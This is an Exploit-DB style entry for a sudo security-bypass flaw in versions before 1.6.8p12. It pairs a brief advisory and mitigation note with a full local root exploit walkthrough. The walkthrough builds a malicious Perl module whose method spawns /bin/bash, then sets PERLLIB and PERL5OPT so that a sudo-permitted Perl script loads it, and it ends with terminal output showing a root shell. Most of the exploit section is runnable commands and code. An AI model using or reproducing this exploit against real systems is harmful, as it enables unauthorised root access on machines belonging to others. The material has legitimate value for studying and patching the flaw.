Sudo Security Bypass Vulnerability

vendor:

Sudo

by:

breno

7.5

CVSS

HIGH

Security Bypass

CWE

Product Name: Sudo

Affected Version From: Sudo versions prior to 1.6.8p12

Affected Version To:

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

Sudo Security Bypass Vulnerability

Sudo is prone to a security-bypass vulnerability that could lead to arbitrary code execution. This issue is due to an error in the application when handling the 'PERLLIB', 'PERL5LIB', and 'PERL5OPT' environment variables when tainting is ignored. An attacker can exploit this vulnerability to bypass security restrictions and include arbitrary library files.

Mitigation:

Update to Sudo version 1.6.8p12 or later to address this issue.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/15394/info

Sudo is prone to a security-bypass vulnerability that could lead to arbitrary code execution. This issue is due to an error in the application when handling the 'PERLLIB', 'PERL5LIB', and 'PERL5OPT' environment variables when tainting is ignored.

An attacker can exploit this vulnerability to bypass security restrictions and include arbitrary library files.

To exploit this vulnerability, an attacker must be able to run Perl scripts through Sudo.

## Sudo local root exploit ##
## vuln versions : sudo < 1.6.8p12
## adv : https://www.securityfocus.com/bid/15394
## adv : http://www.frsirt.com/bulletins/2642

##by breno - breno@kalangolinux.org

## You need execute access to perl script in sudo ##

## cat /etc/sudoers ##

breno   ALL=(ALL) /home/breno/code.pl

## Now let's create your own perl module FTP.pm :) good name.

breno  ~ $ -> mkdir modules
breno  ~ $ -> mkdir FTP
breno  ~/modules $ -> ls
FTP
breno  ~/modules $ -> cd FTP
breno  ~/modules/FTP $ -> h2xs -AXc -n FTP
Defaulting to backwards compatibility with perl 5.8.7
If you intend this module to be compatible with earlier perl versions, please
specify a minimum perl version with the -b option.

Writing FTP/lib/FTP.pm
Writing FTP/Makefile.PL
Writing FTP/README
Writing FTP/t/FTP.t
Writing FTP/Changes
Writing FTP/MANIFEST
breno  ~/modules/FTP $ ->

breno  ~/modules/FTP/FTP $ -> perl Makefile.PL
Checking if your kit is complete...
Looks good
Writing Makefile for FTP
breno  ~/modules/FTP/FTP $ -> make
cp lib/FTP.pm blib/lib/FTP.pm
Manifying blib/man3/FTP.3pm
breno  ~/modules/FTP/FTP $ -> make test
PERL_DL_NONLAZY=1 /usr/bin/perl "-MExtUtils::Command::MM" "-e" "test_harness(0,
'blib/lib', 'blib/arch')" t/*.t
t/FTP....ok
All tests successful.
Files=1, Tests=1,  0 wallclock secs ( 0.03 cusr +  0.01 csys =  0.04 CPU)
breno  ~/modules/FTP/FTP $ ->

#Now i deleted the default FTP.pm (it was ugly), and create my beautiful module

breno  ~/modules/FTP/FTP/blib/lib $ -> vi FTP.pm

package FTP;

use strict;
use vars qw($VERSION);
$VERSION = '0.01';

sub new {
  my $package = shift;
  return bless({}, $package);
}

sub verbose {
    my $self = shift;
    system("/bin/bash");
    if (@_) {
    $self->{'verbose'} = shift;
      }
       return $self->{'verbose'};
}

sub hoot {
   my $self = shift;
   return "Don't pollute!" if $self->{'verbose'};
   return;
}

1;
__END__

EOF

# Remenber our super code.pl

breno  ~ $ -> vi code.pl

#!/usr/bin/perl

BEGIN { $| = 1; print "1..1\n"; }
END {print "not ok 1\n" unless $loaded;}
use FTP;
$loaded = 1;
print "ok 1\n";

my $obj = new FTP;
$obj->verbose(1);
my $result = $obj->hoot;
print ($result eq "Don't pollute!" ? "ok 2\n" : "not ok 2\n");

$obj->verbose(0);
my $result = $obj->hoot;
print ($result eq "" ? "ok 3\n" : "not ok 3\n");


EOF


# Now let's play with PERLLIB and PERL5OPT env.

breno  ~ $ -> export PERLLIB="/home/breno/modules/FTP/FTP/blib/lib/"
breno  ~ $ -> export PERL5OPT="-MFTP"

# Now get Root!! :)

breno  ~ $ -> sudo ./code.pl
Password:
1..1
ok 1
root  ~ # -> id
uid=0(root) gid=0(root) grupos=0(root)
root  ~ # ->